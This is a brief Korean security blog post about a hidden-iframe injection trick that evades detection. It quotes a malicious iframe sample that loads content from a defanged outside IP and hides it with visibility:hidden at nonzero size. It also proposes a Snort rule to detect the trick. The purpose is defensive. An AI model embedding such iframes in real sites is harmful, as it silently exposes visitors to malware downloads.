iframe 신종(?) 우회 공격

<iframe name=c24 src=’hxxp://205.234.243.220/d/index.php?’+Math.round(Math.random()*28396)+’9c10b5bc42d8′ width=62 height=458 style=’visibility:hidden’> </iframe>

iframe 삽입 공격의 대부분은 width, height 값을 0으로 해서 웹 페이지에 삽입해서 User들이 모르게 악성파일을 설치하기 위한 목적으로 사용된다.

그렇기때문에 보안 장비에서 대부분 width, height 값이 둘 중에 0일때 탐지/차단을 한다..물론 오탐도 발생한다..^^; 그래서 좀더 세밀하게 만든다..

위 코드에서 사용된 style=’visibility:hidden’ 은 iframe을 보이지 않게한다..
 이런식으로 공격을 한다면 대부분의 보안 장비에서 우회할 것으로 판단된다.

여기에서 다시 생각해보면 정상적인 사이트에서 iframe에 width, height 값에 0이 아닌 값을 주고 굳이 style=’visibility:hidden’ 옵션을 써서 iframe을 숨길까?

우선 아래와 같이 만들어봤다.

alert tcp $EXTERNAL_NET $HTTP_PORTS->$HOME_NET any(msg:”iframe evation attack-visibility:hidden”; flow:established,from_server; content:”<iframe”; nocase; pcre:”/<iframe.{0,40}src=(‘|”)(http|ftp)://.*(width|height)=[^=0].*style=(‘|”)visibility:(\s)?hidden(‘|”)/i”; sid:XXXXXXX; rev:1;)

오탐 발생하면 알려주시고 고칠 부분이 있으면 comment 달아주십시요..^^

ps. 위 iframe 코드를 제공해준 나의 영원한 동반자인 이지스(bscry) 고맙다.

WebSense에서도 같은 날짜(?)에 발견하였네요.. ^^ 그래서 패턴 변경하였습니다.

http://securitylabs.websense.com/content/Alerts/3488.aspx

Advertisements

About this entry